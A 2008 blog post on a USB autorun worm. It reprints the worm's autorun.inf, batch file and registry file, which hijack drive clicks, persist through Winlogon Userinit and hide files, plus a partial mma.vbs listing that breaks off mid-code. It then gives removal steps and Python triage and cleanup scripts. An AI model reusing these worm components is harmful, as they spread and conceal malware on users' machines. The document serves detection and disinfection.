
Tuesday, February 19, 2008

Infected With Autorun.inf, Mma.bat, Mma.rar, Mma.reg, Mma.vbs

autorun.inf
Code:
[autorun]
open=
; "Open" verb on the drive's context menu; Default=1 makes it the double-click action,
; so simply opening the drive in Explorer runs mma.vbs through the Windows Script Host
shell\open=Open(Sub7@Chatx.net)
shell\open\Command=WScript.exe .\mma.vbs
shell\open\Default=1
; the "Explore" verb is hijacked the same way, so either choice starts the payload
shell\explore=explore(Sub7@Chatx.net)
shell\explore\Command=WScript.exe .\mma.vbs


mma.bat
Code:
@echo off
rem Apply the persistence and hiding registry changes if mma.reg is alongside.
if exist .\mma.reg regedit /s .\mma.reg
rem No argument (the Userinit launch at logon): run the VBS payload from the
rem current directory or, failing that, from system32, then quit.
if not "%1"=="" goto open
if exist mma.vbs start WScript.exe mma.vbs&exit
if exist %SYSTEMROOT%\system32\mma.vbs start WScript.exe %SYSTEMROOT%\system32\mma.vbs&exit
exit
:open
rem "Open" argument: open the drive in Explorer so the victim sees nothing odd.
if not "%1"=="Open" goto next
start explorer .\
exit
:next
rem "+ <drive>" argument: mark the dropped files System+Archive+Hidden+Read-only.
if "%1"=="+" attrib +s +a +h +r %2\mma.*
if "%1"=="+" attrib +s +a +h +r %2\autorun.inf
:end


mma.reg
Code:
Windows Registry Editor Version 5.00

; Winlogon starts every program in this comma-separated list at each logon;
; appending mma.bat makes the worm start with every user session.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="userinit.exe,mma.bat"

; Turn off "Show protected operating system files" in Explorer so the
; System+Hidden files set by mma.bat stay invisible in folder views.
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden"=dword:00000000


mma.vbs
Code:
'dranyamcram v1.0
'Davao City Phils
'September 3, 2007
'Sub7@ChatX.net

on error resume next
Set WshShell =CreateObject("WScript.Shell")


For i=1 to 1

set Of = CreateObject("Scripting.FileSystemObject")
set dir = Of.GetSpecialFolder(1)

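The two indicators above (an autorun.inf whose shell verbs launch a script host, and a Userinit value with something chained after userinit.exe) can be checked without touching the infected machine's shell. The script below is an added example, not code from the original post: it parses an autorun.inf and a Userinit string and reports what a responder should look at. The list of script hosts and script extensions is an assumption you can extend; the sample inputs are the autorun.inf and mma.reg value listed above plus a constructed benign CD-style autorun.inf for comparison.

```python
"""Triage helpers for the mma autorun worm listed above (added example).

Given the text of an autorun.inf and the Winlogon "Userinit" value, report
drive shell actions that launch a script host and programs chained onto
userinit.exe.
"""
import configparser
import ntpath
import re

# Interpreters and launchers that a legitimate autorun.inf never needs
# (assumed list; extend it for your environment).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe", "mshta.exe",
                "rundll32.exe", "powershell.exe"}
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".bat", ".cmd", ".wsf")


def parse_autorun(text):
    """Return the [autorun] section as a dict of lowercase key -> value.

    Only '=' is treated as the delimiter because ':' appears in drive paths;
    duplicate keys are tolerated (last one wins) and malformed input gives {}.
    """
    cp = configparser.RawConfigParser(strict=False, delimiters=("=",))
    try:
        cp.read_string(text)
    except configparser.Error:
        return {}
    if not cp.has_section("autorun"):
        return {}
    return dict(cp.items("autorun"))   # configparser lowercases the keys


def launched_program(command):
    """Lowercase basename of the program a command line starts (quoted or not)."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', command)
    if not m:
        return ""
    return ntpath.basename(m.group(1) or m.group(2)).lower()


def suspicious_actions(autorun):
    """(key, command) pairs for open=, shellexecute= and shell\\<verb>\\command=
    entries that run a script host or a script file."""
    hits = []
    for key, value in autorun.items():
        if key not in ("open", "shellexecute") and not key.endswith("\\command"):
            continue
        prog = launched_program(value)
        if prog in SCRIPT_HOSTS or prog.endswith(SCRIPT_EXTS):
            hits.append((key, value.strip()))
    return hits


def default_verb(autorun):
    """Verb run on double-click: the worm's shell\\<verb>\\Default=1 line,
    otherwise the documented shell=<verb> entry; None if neither is set."""
    for key, value in autorun.items():
        if key.startswith("shell\\") and key.endswith("\\default") and value.strip() == "1":
            return key.split("\\")[1]
    return autorun.get("shell", "").strip().lower() or None


def userinit_extras(value):
    """Programs chained onto Userinit besides userinit.exe itself.

    The clean value is 'C:\\WINDOWS\\system32\\userinit.exe,' (trailing comma);
    everything after a comma is started at every logon, which is how mma.reg
    persists mma.bat.
    """
    extras = []
    for entry in value.split(","):
        entry = entry.strip().strip('"')
        if entry and ntpath.basename(entry).lower() != "userinit.exe":
            extras.append(entry)
    return extras


def triage(autorun_text, userinit_value):
    """Combine both checks into one report dict."""
    autorun = parse_autorun(autorun_text)
    return {
        "suspicious_actions": suspicious_actions(autorun),
        "default_verb": default_verb(autorun),
        "userinit_extras": userinit_extras(userinit_value),
    }


# Sample input copied from the listings above (autorun.inf and the Userinit
# value written by mma.reg), so the script runs offline.
MMA_AUTORUN = """[autorun]
open=
shell\\open=Open(Sub7@Chatx.net)
shell\\open\\Command=WScript.exe .\\mma.vbs
shell\\open\\Default=1
shell\\explore=explore(Sub7@Chatx.net)
shell\\explore\\Command=WScript.exe .\\mma.vbs
"""
MMA_USERINIT = "userinit.exe,mma.bat"
CLEAN_USERINIT = r"C:\WINDOWS\system32\userinit.exe,"

# A constructed benign CD-style autorun.inf for comparison: open=setup.exe is
# normal for install media and is not flagged.
BENIGN_AUTORUN = "[autorun]\nopen=setup.exe\nicon=setup.exe,0\nlabel=Product CD\n"

if __name__ == "__main__":
    print("mma:   ", triage(MMA_AUTORUN, MMA_USERINIT))
    print("benign:", triage(BENIGN_AUTORUN, CLEAN_USERINIT))
```

On a live machine, feed `parse_autorun` the contents of each drive root's autorun.inf and `userinit_extras` the value read from HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon; a non-empty result from either is the cue to follow the removal steps below.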
Solution 1
Download Flash_Disinfector.exe by sUBs and save it to your desktop.
  • Double-click Flash_Disinfector.exe to run it and follow any prompts that may appear.
  • The utility may ask you to insert your flash drive and/or other removable drives. Please do so and allow the utility to clean up those drives as well.
  • Wait until it has finished scanning and then exit the program.
  • Reboot your computer when done.
Note: Flash_Disinfector will create a hidden folder named autorun.inf in each partition and every USB drive plugged in when you ran it. Don't delete this folder...it will help protect your drives from future infection.

Reboot your computer in "Safe Mode" or "Safe Mode With Command Prompt" using the F8 method. To do this, restart your computer and, after hearing it beep once during startup (but before the Windows logo appears), press the F8 key repeatedly. A menu will appear with several options. Use the arrow keys to select "Safe Mode With Command Prompt" and press Enter.

Go to Start > Run and type: cmd
  • Press OK. (If you chose "Safe Mode With Command Prompt" you are already at a prompt.)
  • At the command prompt, type your primary drive letter, usually C:
  • Hit Enter.
  • You may need to change to the root directory. If so, type: cd \
  • Hit Enter.
  • Type: attrib -s -h -r -a autorun.inf
  • Hit Enter. All four attributes are cleared in one command on purpose: attrib will not remove Hidden or Read-only while the System attribute is still set.
  • Type: dir /a
  • Hit Enter. This lets you see and confirm the autorun files (/a also lists anything still hidden).
  • Type: del autorun.inf
  • Hit Enter. If the listing shows autorun.inf as <DIR>, it is the protective folder created by Flash_Disinfector; leave it alone.
  • Repeat the above commands for each drive on your computer.
Now search for and remove Mma.vbs, Mma.rar, Mma.reg and Mma.bat if present.
  • At the command prompt, type your primary drive letter, usually C:
  • Hit Enter.
  • Type: attrib -s -h -r -a Mma.vbs
  • Hit Enter.
  • Type: dir /s Mma.vbs
  • Hit Enter.
  • If the file is present, type: del Mma.vbs
  • Hit Enter. dir /s also searches subdirectories, and mma.bat looks for its payload in %SYSTEMROOT%\system32 as well, so if the listing shows a copy there, cd into that directory and repeat the attrib and del commands on it.
  • Repeat the above commands for each drive on your computer.
  • Then repeat these instructions for Mma.rar, Mma.reg and Mma.bat.
  • Exit the command prompt and reboot normally.
Solution 2
Do the following:

1. Run Task Manager (Ctrl-Alt-Del or right-click on the Taskbar).
2. Stop the wscript.exe process if it is present: just highlight the process and press End Task.
3. Then terminate the explorer.exe process.
4. In Task Manager, click on File -> New Task (Run…).
5. Type "cmd" (without quotes) into the Open text box and click OK.
6. Type the following commands one by one, hitting the Enter key after each:

Code:
del c:\autorun.* /f /s /q /a
del d:\autorun.* /f /s /q /a


Assuming your PC has drives up to F:, continue the same pattern: del f:\autorun.* /f /s /q /a. The switches matter here: /f forces deletion of read-only files, /s searches subfolders, /q suppresses the confirmation prompt, and /a with no letter matches files regardless of the Hidden and System attributes, so no separate attrib step is needed for this part.

7. In Task Manager, click on File -> New Task (Run…).
8. Type regedit into the Open text box and click OK.
9. Navigate to the following registry key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

10) Check this value:

"Userinit"="C:\WINDOWS\system32\userinit.exe,"

That is what the registry should contain. If anything else is chained after it, like mma.bat, delete just that part. Keep the userinit.exe entry and its trailing comma; if the Userinit value is broken you will not be able to log on.


11) Restart your computer in safe mode.

12) Disable System Restore, so the dropped files are not preserved in a restore point and brought back later.

13) Open Notepad and copy the following:

attrib -S -H -R -A c:\mma.bat
attrib -S -H -R -A c:\mma.rar
attrib -S -H -R -A c:\mma.reg
attrib -S -H -R -A c:\mma.vbs
attrib -S -H -R -A d:\mma.bat
attrib -S -H -R -A d:\mma.rar
attrib -S -H -R -A d:\mma.reg
attrib -S -H -R -A d:\mma.vbs


If you have more drives, just continue the same pattern (e.g. attrib -S -H -R -A f:\mma.vbs). The -S is required: mma.bat sets the System attribute on these files, and attrib refuses to clear Hidden or Read-only while System is set, so -H -R alone would report "Not resetting system file" and leave the files hidden.


14) Save it as "remove.bat" and double-click it (this way the files become visible).

15) Go to the root directory of each drive and delete all of these:

Code:
mma.bat
mma.rar
mma.reg
mma.vbs

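Both solutions repeat the same unhide-then-delete loop for every drive letter by hand. The script below is an added example, not code from the original post, that does that loop for a list of drive roots plus %SystemRoot%\system32 (where mma.bat also looks for mma.vbs). It assumes Python is available on the infected machine or a rescue environment; the Userinit registry value is still restored by hand as in step 10. Because attrib exists only on Windows, the read-only bit is cleared with chmod elsewhere so the script can be exercised on any system, and the Flash_Disinfector autorun.inf folder is deliberately left in place.

```python
"""Clean-up of the mma worm's dropped files (added example, not from the post).

Automates the attrib/del loop of Solutions 1 and 2 for every root given.
Run with --dry-run first to list what would be removed.
"""
import os
import stat
import string
import subprocess
import sys

# File names dropped in each drive root according to the listings above.
DROPPED = ("mma.bat", "mma.rar", "mma.reg", "mma.vbs", "autorun.inf")


def unhide(path):
    """Clear System/Hidden/Read-only/Archive so the file can be deleted.

    attrib refuses to change Hidden or Read-only while System is set, so all
    four flags are cleared in one call, as in the manual commands. Outside
    Windows only the owner write bit exists, so chmod stands in for attrib.
    """
    if os.name == "nt":
        subprocess.run(["attrib", "-s", "-h", "-r", "-a", path], check=False)
    else:
        os.chmod(path, os.stat(path).st_mode | stat.S_IWUSR)


def find_dropped(roots):
    """Paths of worm files present directly under each root (case-insensitive)."""
    found = []
    for root in roots:
        try:
            names = {n.lower(): n for n in os.listdir(root)}
        except OSError:          # missing path, empty CD drive, no permission
            continue
        for wanted in DROPPED:
            if wanted in names:
                candidate = os.path.join(root, names[wanted])
                # Flash_Disinfector's protective autorun.inf is a folder; keep it.
                if os.path.isfile(candidate):
                    found.append(candidate)
    return found


def remove_dropped(roots, dry_run=False):
    """Unhide and delete every worm file under the roots; return the paths handled."""
    removed = []
    for path in find_dropped(roots):
        if not dry_run:
            unhide(path)
            os.remove(path)
        removed.append(path)
    return removed


def default_roots():
    """All lettered drive roots on Windows plus %SystemRoot%\\system32."""
    if os.name != "nt":
        return []
    roots = [f"{d}:\\" for d in string.ascii_uppercase if os.path.isdir(f"{d}:\\")]
    roots.append(os.path.join(os.environ.get("SystemRoot", r"C:\WINDOWS"), "system32"))
    return roots


if __name__ == "__main__":
    dry = "--dry-run" in sys.argv
    for p in remove_dropped(default_roots(), dry_run=dry):
        print(("would remove " if dry else "removed ") + p)
```

Run it from an elevated prompt after the wscript.exe process has been ended, otherwise the payload can re-drop the files while you delete them; with no explorer.exe running (step 3 of Solution 2) nothing re-triggers the autorun handlers in the meantime.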

